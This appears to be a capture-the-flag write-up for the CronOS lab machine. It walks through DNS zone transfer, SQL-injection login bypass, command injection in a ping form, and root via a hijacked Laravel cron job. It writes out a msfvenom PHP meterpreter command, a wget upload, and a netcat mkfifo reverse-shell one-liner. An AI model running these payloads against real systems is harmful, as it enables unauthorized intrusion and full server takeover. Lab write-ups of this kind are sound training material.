Today's write-up will be for the CronOS Machine. The machine involves Cron Jobs: Googling the word Cron if you aren't familiar with it is, "a Linux utility which schedules a command or script on your server to run automatically at a specified time and date. A cron job is the scheduled task itself. Cron jobs can be very useful to automate repetitive tasks."
OS : Linux
IP : 10.10.10.13
Enumeration:
nmap scan reveals 4 ports are open 22, 53 and 80. We explore the IP:port in the browser and get a Apache2 Ubuntu default page. The Html source code is a dead end as well.
Before giving up on the default page, we start burp and intercept the request from the default page and change the host value (10.10.10.13) to the host name of the box (cronos.htb). The host name can be obtained via multiple ways in general; 1. wireshark traffic capture between your local IP and remote IP 2)Top left of your firefox url bar before you input http://..., there is a black circular icon with a white letter i on it, follow the more information, general tab to find it. This works when you input https as well. 3) In some instances the html source code might have it 4) Run Sparta enumeration tool and right click on the IP/port 443 and click on sslyze.
We then forward the request with the host name cronos.htb and upon viviting the page we see a new webpage cronos.
We add cronos.htb to our /etc/hosts file and refreshing the page doesn't yield any more interesting stuff. Next I enumerate the DNS port using the command: host -l cronos.htb 10.10.10.13 and nslookup + dig command for dns zone transfers to see if I can find more sub domains. We find more subdomains which we add to our etc/host file.
Upon visiting all three subdomains in the url, only admin.cronos.htb gives us a login page requiring username and pass. The rest are dead ends. By using manual sql injection, We are able to login using the usernames: ' OR 1=1#, admin'-- - and a random password: pass. We then get a search box with the ping and trace route command. We add ;whoami and start burp to capture the request, upon forwarding with repeater, we are able to get command injection and user www-data.
Exploitation:
There are various exploitation methods;
1.Create a msfvenon php backdoor (msfvenom -p php/meterpreter_reverse_tcp lhost=I$P LPORT=1234 > evil.php) and upload it to our server as a text file and rename to php (8.8.8.8; wget $localIP/evil.txt -P /var/www/admin/ and use msfhandler to get the shell.
2.Use the msfconsoles /multi/script/web_delivery exploit to get a shell
3.Use burp. I chose to use burp.
We use pentest monkey reverse shell to get a nc reverse shell (rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f) which we can server through burp. We also have our nc listener running and url encode the nc shell using ctrl+u or right click and chose url encode all key characters and we get a shell with user www-data. We use python -c "import pty;pty.spawn('/bin/bash');" to get a full shell and it gives us the cron-os user.
Privilege Escalation:
We run the script LinEnum.sh and see that we have a crontab script called Laravel run by root every minute. We can get code execution by getting laravel to run a scheduled task or replace it with a php-reverse-shell script.
We download a php-reverse-shell script to the shells /tmp folder and set up a nc listener. The backdoor can be found in kali using the locate command or pentest monkey. Change the IP to your local host IP and the port can be left defalut to 1234 for the nc listener.We upload the php-reverse-shell file to same location as the artisan file (/var/www/laravel/artisan). We use the mv command to replace the original artisan file. Since we already have a nc listener started ( nc –lvp 1234), we wait as per the crontab, the artisan task is scheduled to be executed whenever its turn comes up. After a few minutes, the artisan file is executed, and we get a root shell and flag!!!
Comments
Post a Comment